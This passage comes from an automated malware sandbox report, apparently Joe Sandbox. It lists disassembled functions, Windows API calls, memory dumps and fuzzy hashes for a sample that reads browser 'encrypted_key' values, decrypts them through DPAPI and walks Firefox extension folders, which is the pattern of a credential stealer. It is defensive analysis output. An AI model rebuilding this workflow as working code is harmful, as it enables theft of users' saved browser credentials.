                            • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                            • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E01580,00E00D92), ref: 00DEF54C
                          • lstrlen.KERNEL32(00000000), ref: 00DEF56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: 821a804907ddcc4911ed429f3f96c8dc5bb78061dad11b94c5f54b2a89065583
                          • Instruction ID: a897a1def379ebb90cdc72012dcabf322579de12dbf2e2170a577c42cbbc86c2
                          • Opcode Fuzzy Hash: 821a804907ddcc4911ed429f3f96c8dc5bb78061dad11b94c5f54b2a89065583
                          • Instruction Fuzzy Hash: 2B510DB190010CAADB04FBA8DC96DFD7338EF54340F45C528FA1A67195EE746A09CBB2
                          Function 00DF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: a3c2da55e72b7ba0d2e93ae8009169cd3f31fed4c01efb48d69f050f577721f2
                          • Instruction ID: afc0eba301d3169d1c6c90418dcd24f7b2d31ff37b9aec7abf42ca0bc9df9e6b
                          • Opcode Fuzzy Hash: a3c2da55e72b7ba0d2e93ae8009169cd3f31fed4c01efb48d69f050f577721f2
                          • Instruction Fuzzy Hash: 68410BB1D1020EEBCB04EFA8D845AFEB774EF44304F15C418E616B6290DB75AA49CBB1
                          Function 00DE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                            • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                            • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                            • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                            • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                            • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                            • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                            • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                            • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                            • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                            • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                            • Part of subcall function 00DE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                            • Part of subcall function 00DE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                            • Part of subcall function 00DE9B60: LocalFree.KERNEL32(?), ref: 00DE9BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: d387672acf483ddcc90e0a5f4de149cc2d7d4522a0c4e736a761ba2236678938
                          • Instruction ID: 13277152bc85203aca9750fb35af9bb60adc764781b45b66a908bf37aaed1a83
                          • Opcode Fuzzy Hash: d387672acf483ddcc90e0a5f4de149cc2d7d4522a0c4e736a761ba2236678938
                          • Instruction Fuzzy Hash: 74315EB6D1121DABCF04EFE5DC95AEEB7B8EF48304F144518EA05A7241EB349A04CBB1
                          Function 00DF92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(00DF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DF3AEE,?), ref: 00DF92FC
                          • GetFileSizeEx.KERNEL32(000000FF,00DF3AEE), ref: 00DF9319
                          • CloseHandle.KERNEL32(000000FF), ref: 00DF9327
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                          • Instruction ID: 6d957af6572b69ffdae4ffa927f33fcce5df715b20d072493b2048bbf28636ad
                          • Opcode Fuzzy Hash: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                          • Instruction Fuzzy Hash: A2F06934F00208FBDB20DEA4DC18FAEB7F9AB48310F21C254EA91A72C4DA7596008B50
                          Function 00DFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00DFC74E
                            • Part of subcall function 00DFBF9F: __amsg_exit.LIBCMT ref: 00DFBFAF
                          • __getptd.LIBCMT ref: 00DFC765
                          • __amsg_exit.LIBCMT ref: 00DFC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00DFC797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                          • Instruction ID: 7fff97b43733d334436f56b55935f516305b2def4e0f9bd117f504ff066576ac
                          • Opcode Fuzzy Hash: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                          • Instruction Fuzzy Hash: 98F0907291430C9BD720BBB89D06B7A33A0EF00735F2BD14AF744AA1D2DB645990DE76
                          Function 00DF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00DF4F7A
                          • lstrcat.KERNEL32(?,00E01070), ref: 00DF4F97
                          • lstrcat.KERNEL32(?,00838A68), ref: 00DF4FAB
                          • lstrcat.KERNEL32(?,00E01074), ref: 00DF4FBD
                            • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                            • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                            • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                            • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                            • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2255212826.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                          • Associated: 00000000.00000002.2255196245.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255212826.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000011C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255396980.00000000012E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255695540.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255836687.0000000001480000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2255853576.0000000001481000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                          • Instruction ID: 4449cc0008ea4fe21374c391efa08b5fa422ba5b740b157a115c0b35c53724e8
                          • Opcode Fuzzy Hash: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                          • Instruction Fuzzy Hash: BD218B7AA00308ABC774FB60DC46EEE733CEB54300F108554F69997585DEB996C88BB1